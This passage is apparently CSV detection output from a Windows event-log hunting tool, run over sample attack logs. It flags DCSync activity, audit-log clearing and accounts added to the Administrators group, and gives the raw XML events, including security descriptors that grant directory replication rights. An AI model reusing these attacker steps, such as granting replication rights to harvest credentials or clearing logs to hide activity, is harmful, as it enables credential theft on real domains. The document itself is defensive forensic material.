&lt;RunOnlyIfNetworkAvailable&gt;false&lt;/RunOnlyIfNetworkAvailable&gt;
&lt;IdleSettings&gt;
&lt;StopOnIdleEnd&gt;true&lt;/StopOnIdleEnd&gt;
&lt;RestartOnIdle&gt;false&lt;/RestartOnIdle&gt;
&lt;/IdleSettings&gt;
&lt;AllowStartOnDemand&gt;true&lt;/AllowStartOnDemand&gt;
&lt;Enabled&gt;true&lt;/Enabled&gt;
&lt;Hidden&gt;true&lt;/Hidden&gt;
&lt;RunOnlyIfIdle&gt;false&lt;/RunOnlyIfIdle&gt;
&lt;DisallowStartOnRemoteAppSession&gt;false&lt;/DisallowStartOnRemoteAppSession&gt;
&lt;UseUnifiedSchedulingEngine&gt;true&lt;/UseUnifiedSchedulingEngine&gt;
&lt;WakeToRun&gt;false&lt;/WakeToRun&gt;
&lt;ExecutionTimeLimit&gt;PT0S&lt;/ExecutionTimeLimit&gt;
&lt;Priority&gt;7&lt;/Priority&gt;
&lt;RestartOnFailure&gt;
&lt;Interval&gt;PT1M&lt;/Interval&gt;
&lt;Count&gt;3&lt;/Count&gt;
&lt;/RestartOnFailure&gt;
&lt;/Settings&gt;
&lt;Actions Context=&quot;NetworkService&quot;&gt;
&lt;ComHandler&gt;
&lt;ClassId&gt;{B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}&lt;/ClassId&gt;
&lt;Data&gt;&lt;![CDATA[timer]]&gt;&lt;/Data&gt;
&lt;/ComHandler&gt;
&lt;/Actions&gt;
&lt;/Task&gt;</Data>
</EventData>
</Event>",DC1.insecurebank.local,Security
schedule task updated,1553514820.047682,2019-03-25T15:53:40.047682+04:00,,Audit,Low,schedule task updated by user,4702,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>4702</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12804</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-25T11:52:45.143617Z"">
</TimeCreated>
<EventRecordID>198238774</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""4024"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""SubjectUserSid"">S-1-5-20</Data>
<Data Name=""SubjectUserName"">DC1$</Data>
<Data Name=""SubjectDomainName"">insecurebank</Data>
<Data Name=""SubjectLogonId"">0x3e4</Data>
<Data Name=""TaskName"">\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask</Data>
<Data Name=""TaskContentNew"">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-16&quot;?&gt;
&lt;Task version=&quot;1.4&quot; xmlns=&quot;http://schemas.microsoft.com/windows/2004/02/mit/task&quot;&gt;
&lt;RegistrationInfo&gt;
&lt;Source&gt;$(@%systemroot%\system32\sppc.dll,-200)&lt;/Source&gt;
&lt;Author&gt;$(@%systemroot%\system32\sppc.dll,-200)&lt;/Author&gt;
&lt;Version&gt;1.0&lt;/Version&gt;
&lt;Description&gt;$(@%systemroot%\system32\sppc.dll,-201)&lt;/Description&gt;
&lt;URI&gt;\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask&lt;/URI&gt;
&lt;SecurityDescriptor&gt;D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-87-2912274048-3994893941-1669128114-1310430903-1263774323)&lt;/SecurityDescriptor&gt;
&lt;/RegistrationInfo&gt;
&lt;Triggers&gt;
&lt;CalendarTrigger&gt;
&lt;StartBoundary&gt;2019-03-26T11:51:45Z&lt;/StartBoundary&gt;
&lt;Enabled&gt;true&lt;/Enabled&gt;
&lt;ScheduleByDay&gt;
&lt;DaysInterval&gt;1&lt;/DaysInterval&gt;
&lt;/ScheduleByDay&gt;
&lt;/CalendarTrigger&gt;
&lt;/Triggers&gt;
&lt;Principals&gt;
&lt;Principal id=&quot;NetworkService&quot;&gt;
&lt;UserId&gt;S-1-5-20&lt;/UserId&gt;
&lt;RunLevel&gt;LeastPrivilege&lt;/RunLevel&gt;
&lt;/Principal&gt;
&lt;/Principals&gt;
&lt;Settings&gt;
&lt;MultipleInstancesPolicy&gt;IgnoreNew&lt;/MultipleInstancesPolicy&gt;
&lt;DisallowStartIfOnBatteries&gt;false&lt;/DisallowStartIfOnBatteries&gt;
&lt;StopIfGoingOnBatteries&gt;false&lt;/StopIfGoingOnBatteries&gt;
&lt;AllowHardTerminate&gt;false&lt;/AllowHardTerminate&gt;
&lt;StartWhenAvailable&gt;true&lt;/StartWhenAvailable&gt;
&lt;RunOnlyIfNetworkAvailable&gt;false&lt;/RunOnlyIfNetworkAvailable&gt;
&lt;IdleSettings&gt;
&lt;StopOnIdleEnd&gt;true&lt;/StopOnIdleEnd&gt;
&lt;RestartOnIdle&gt;false&lt;/RestartOnIdle&gt;
&lt;/IdleSettings&gt;
&lt;AllowStartOnDemand&gt;true&lt;/AllowStartOnDemand&gt;
&lt;Enabled&gt;true&lt;/Enabled&gt;
&lt;Hidden&gt;true&lt;/Hidden&gt;
&lt;RunOnlyIfIdle&gt;false&lt;/RunOnlyIfIdle&gt;
&lt;DisallowStartOnRemoteAppSession&gt;false&lt;/DisallowStartOnRemoteAppSession&gt;
&lt;UseUnifiedSchedulingEngine&gt;true&lt;/UseUnifiedSchedulingEngine&gt;
&lt;WakeToRun&gt;false&lt;/WakeToRun&gt;
&lt;ExecutionTimeLimit&gt;PT0S&lt;/ExecutionTimeLimit&gt;
&lt;Priority&gt;7&lt;/Priority&gt;
&lt;RestartOnFailure&gt;
&lt;Interval&gt;PT1M&lt;/Interval&gt;
&lt;Count&gt;3&lt;/Count&gt;
&lt;/RestartOnFailure&gt;
&lt;/Settings&gt;
&lt;Actions Context=&quot;NetworkService&quot;&gt;
&lt;ComHandler&gt;
&lt;ClassId&gt;{B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}&lt;/ClassId&gt;
&lt;Data&gt;&lt;![CDATA[timer]]&gt;&lt;/Data&gt;
&lt;/ComHandler&gt;
&lt;/Actions&gt;
&lt;/Task&gt;</Data>
</EventData>
</Event>",DC1.insecurebank.local,Security
schedule task updated,1553513019.936605,2019-03-25T15:23:39.936605+04:00,,Audit,Low,schedule task updated by user,4702,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>4702</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12804</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-25T11:22:45.080609Z"">
</TimeCreated>
<EventRecordID>198238563</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""2260"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""SubjectUserSid"">S-1-5-20</Data>
<Data Name=""SubjectUserName"">DC1$</Data>
<Data Name=""SubjectDomainName"">insecurebank</Data>
<Data Name=""SubjectLogonId"">0x3e4</Data>
<Data Name=""TaskName"">\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask</Data>
<Data Name=""TaskContentNew"">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-16&quot;?&gt;
&lt;Task version=&quot;1.4&quot; xmlns=&quot;http://schemas.microsoft.com/windows/2004/02/mit/task&quot;&gt;
&lt;RegistrationInfo&gt;
&lt;Source&gt;$(@%systemroot%\system32\sppc.dll,-200)&lt;/Source&gt;
&lt;Author&gt;$(@%systemroot%\system32\sppc.dll,-200)&lt;/Author&gt;
&lt;Version&gt;1.0&lt;/Version&gt;
&lt;Description&gt;$(@%systemroot%\system32\sppc.dll,-201)&lt;/Description&gt;
&lt;URI&gt;\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask&lt;/URI&gt;
&lt;SecurityDescriptor&gt;D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-87-2912274048-3994893941-1669128114-1310430903-1263774323)&lt;/SecurityDescriptor&gt;
&lt;/RegistrationInfo&gt;
&lt;Triggers&gt;
&lt;CalendarTrigger&gt;
&lt;StartBoundary&gt;2019-03-26T11:21:44Z&lt;/StartBoundary&gt;
&lt;Enabled&gt;true&lt;/Enabled&gt;
&lt;ScheduleByDay&gt;
&lt;DaysInterval&gt;1&lt;/DaysInterval&gt;
&lt;/ScheduleByDay&gt;
&lt;/CalendarTrigger&gt;
&lt;/Triggers&gt;
&lt;Principals&gt;
&lt;Principal id=&quot;NetworkService&quot;&gt;
&lt;UserId&gt;S-1-5-20&lt;/UserId&gt;
&lt;RunLevel&gt;LeastPrivilege&lt;/RunLevel&gt;
&lt;/Principal&gt;
&lt;/Principals&gt;
&lt;Settings&gt;
&lt;MultipleInstancesPolicy&gt;IgnoreNew&lt;/MultipleInstancesPolicy&gt;
&lt;DisallowStartIfOnBatteries&gt;false&lt;/DisallowStartIfOnBatteries&gt;
&lt;StopIfGoingOnBatteries&gt;false&lt;/StopIfGoingOnBatteries&gt;
&lt;AllowHardTerminate&gt;false&lt;/AllowHardTerminate&gt;
&lt;StartWhenAvailable&gt;true&lt;/StartWhenAvailable&gt;
&lt;RunOnlyIfNetworkAvailable&gt;false&lt;/RunOnlyIfNetworkAvailable&gt;
&lt;IdleSettings&gt;
&lt;StopOnIdleEnd&gt;true&lt;/StopOnIdleEnd&gt;
&lt;RestartOnIdle&gt;false&lt;/RestartOnIdle&gt;
&lt;/IdleSettings&gt;
&lt;AllowStartOnDemand&gt;true&lt;/AllowStartOnDemand&gt;
&lt;Enabled&gt;true&lt;/Enabled&gt;
&lt;Hidden&gt;true&lt;/Hidden&gt;
&lt;RunOnlyIfIdle&gt;false&lt;/RunOnlyIfIdle&gt;
&lt;DisallowStartOnRemoteAppSession&gt;false&lt;/DisallowStartOnRemoteAppSession&gt;
&lt;UseUnifiedSchedulingEngine&gt;true&lt;/UseUnifiedSchedulingEngine&gt;
&lt;WakeToRun&gt;false&lt;/WakeToRun&gt;
&lt;ExecutionTimeLimit&gt;PT0S&lt;/ExecutionTimeLimit&gt;
&lt;Priority&gt;7&lt;/Priority&gt;
&lt;RestartOnFailure&gt;
&lt;Interval&gt;PT1M&lt;/Interval&gt;
&lt;Count&gt;3&lt;/Count&gt;
&lt;/RestartOnFailure&gt;
&lt;/Settings&gt;
&lt;Actions Context=&quot;NetworkService&quot;&gt;
&lt;ComHandler&gt;
&lt;ClassId&gt;{B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}&lt;/ClassId&gt;
&lt;Data&gt;&lt;![CDATA[timer]]&gt;&lt;/Data&gt;
&lt;/ComHandler&gt;
&lt;/Actions&gt;
&lt;/Task&gt;</Data>
</EventData>
</Event>",DC1.insecurebank.local,Security
Audit log cleared,1600879816.697344,2020-09-23T20:50:16.697344+04:00,,Audit,Critical,Audit log cleared by user ( Administrator ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
</Provider>
<EventID>1102</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>104</Task>
<Opcode>0</Opcode>
<Keywords>0x4020000000000000</Keywords>
<TimeCreated SystemTime=""2020-09-23T16:49:41.578692Z"">
</TimeCreated>
<EventRecordID>772605</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""5424"" ThreadID=""5816"">
</Execution>
<Channel>Security</Channel>
<Computer>01566s-win16-ir.threebeesco.com</Computer>
<Security>
</Security>
</System>
<UserData>
<LogFileCleared xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
<SubjectUserSid>S-1-5-21-308926384-506822093-3341789130-500</SubjectUserSid>
<SubjectUserName>Administrator</SubjectUserName>
<SubjectDomainName>3B</SubjectDomainName>
<SubjectLogonId>0x7b186</SubjectLogonId>
</LogFileCleared>
</UserData>
</Event>",01566s-win16-ir.threebeesco.com,Security
User added to local group,-11644473600.0,1601-01-01T04:00:00+04:00,,Audit,High,User ( IEUser ) added User ( S-1-5-20 ) to local group ( Administrators ),4732,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>4732</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13826</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-09-22T11:23:19.251925Z"">
</TimeCreated>
<EventRecordID>191030</EventRecordID>
<Correlation ActivityID=""15957A0B-7182-0000-A07A-95158271D501"">
</Correlation>
<Execution ProcessID=""624"" ThreadID=""5108"">
</Execution>
<Channel>Security</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""MemberName"">-</Data>
<Data Name=""MemberSid"">S-1-5-20</Data>
<Data Name=""TargetUserName"">Administrators</Data>
<Data Name=""TargetDomainName"">Builtin</Data>
<Data Name=""TargetSid"">S-1-5-32-544</Data>
<Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
<Data Name=""SubjectUserName"">IEUser</Data>
<Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
<Data Name=""SubjectLogonId"">0x27a10f</Data>
<Data Name=""PrivilegeList"">-</Data>
</EventData>
</Event>",MSEDGEWIN10,Security
User added to local group,1569151399.251925,2019-09-22T15:23:19.251925+04:00,,Audit,High,User ( IEUser ) added User ( S-1-5-21-3461203602-4096304019-2269080069-501 ) to local group ( Administrators ),4732,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>4732</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13826</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-09-22T11:22:05.201727Z"">
</TimeCreated>
<EventRecordID>191029</EventRecordID>
<Correlation ActivityID=""15957A0B-7182-0000-A07A-95158271D501"">
</Correlation>
<Execution ProcessID=""624"" ThreadID=""4452"">
</Execution>
<Channel>Security</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""MemberName"">-</Data>
<Data Name=""MemberSid"">S-1-5-21-3461203602-4096304019-2269080069-501</Data>
<Data Name=""TargetUserName"">Administrators</Data>
<Data Name=""TargetDomainName"">Builtin</Data>
<Data Name=""TargetSid"">S-1-5-32-544</Data>
<Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
<Data Name=""SubjectUserName"">IEUser</Data>
<Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
<Data Name=""SubjectLogonId"">0x27a10f</Data>
<Data Name=""PrivilegeList"">-</Data>
</EventData>
</Event>",MSEDGEWIN10,Security
Dcsync Attack detected,1557284437.586173,2019-05-08T07:00:37.586173+04:00,,Threat,High,User Name ( Administrator ) is suspected doing dcsync attack ,4662,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>4662</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14080</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-08T03:00:37.583261Z"">
</TimeCreated>
<EventRecordID>203056</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""4980"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-500</Data>
<Data Name=""SubjectUserName"">Administrator</Data>
<Data Name=""SubjectDomainName"">insecurebank</Data>
<Data Name=""SubjectLogonId"">0x418a6fb</Data>
<Data Name=""ObjectServer"">DS</Data>
<Data Name=""ObjectType"">%{19195a5b-6da0-11d0-afd3-00c04fd930c9}</Data>
<Data Name=""ObjectName"">%{c6faf700-bfe4-452a-a766-424f84c29583}</Data>
<Data Name=""OperationType"">Object Access</Data>
<Data Name=""HandleId"">0x0</Data>
<Data Name=""AccessList"">%%7688
</Data>
<Data Name=""AccessMask"">0x100</Data>
<Data Name=""Properties"">%%7688
{9923a32a-3607-11d2-b9be-0000f87a36b2}
{19195a5b-6da0-11d0-afd3-00c04fd930c9}
</Data>
<Data Name=""AdditionalInfo"">-</Data>
<Data Name=""AdditionalInfo2""></Data>
</EventData>
</Event>",DC1.insecurebank.local,Security
Audit log cleared,1557284425.304206,2019-05-08T07:00:25.304206+04:00,,Audit,Critical,Audit log cleared by user ( administrator ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
</Provider>
<EventID>1102</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>104</Task>
<Opcode>0</Opcode>
<Keywords>0x4020000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-08T03:00:11.778188Z"">
</TimeCreated>
<EventRecordID>203050</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""744"" ThreadID=""768"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<UserData>
<LogFileCleared xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
<SubjectUserSid>S-1-5-21-738609754-2819869699-4189121830-500</SubjectUserSid>
<SubjectUserName>administrator</SubjectUserName>
<SubjectDomainName>insecurebank</SubjectDomainName>
<SubjectLogonId>0x218b896</SubjectLogonId>
</LogFileCleared>
</UserData>
</Event>",DC1.insecurebank.local,Security
Dcsync Attack detected,1553549325.024634,2019-03-26T01:28:45.024634+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>5136</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14081</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-25T21:28:45.024634Z"">
</TimeCreated>
<EventRecordID>198242594</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""3300"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""OpCorrelationID"">AF3067E0-BB6F-47C2-AA20-F3F458797F38</Data>
<Data Name=""AppCorrelationID"">-</Data>
<Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
<Data Name=""SubjectUserName"">bob</Data>
<Data Name=""SubjectDomainName"">insecurebank</Data>
<Data Name=""SubjectLogonId"">0x40f2719</Data>
<Data Name=""DSName"">insecurebank.local</Data>
<Data Name=""DSType"">%%14676</Data>
<Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
<Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
<Data Name=""ObjectClass"">domainDNS</Data>
<Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
<Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
<Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1
131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
<Data Name=""OperationType"">%%14675</Data>
</EventData>
</Event>",DC1.insecurebank.local,Security
Dcsync Attack detected,1553549325.024634,2019-03-26T01:28:45.024634+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>5136</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14081</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-25T21:28:45.023629Z"">
</TimeCreated>
<EventRecordID>198242593</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""2868"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""OpCorrelationID"">57DCCD4C-7381-4371-8480-D74D47019AD8</Data>
<Data Name=""AppCorrelationID"">-</Data>
<Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
<Data Name=""SubjectUserName"">bob</Data>
<Data Name=""SubjectDomainName"">insecurebank</Data>
<Data Name=""SubjectLogonId"">0x40f2719</Data>
<Data Name=""DSName"">insecurebank.local</Data>
<Data Name=""DSType"">%%14676</Data>
<Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
<Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
<Data Name=""ObjectClass"">domainDNS</Data>
<Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
<Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
<Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-7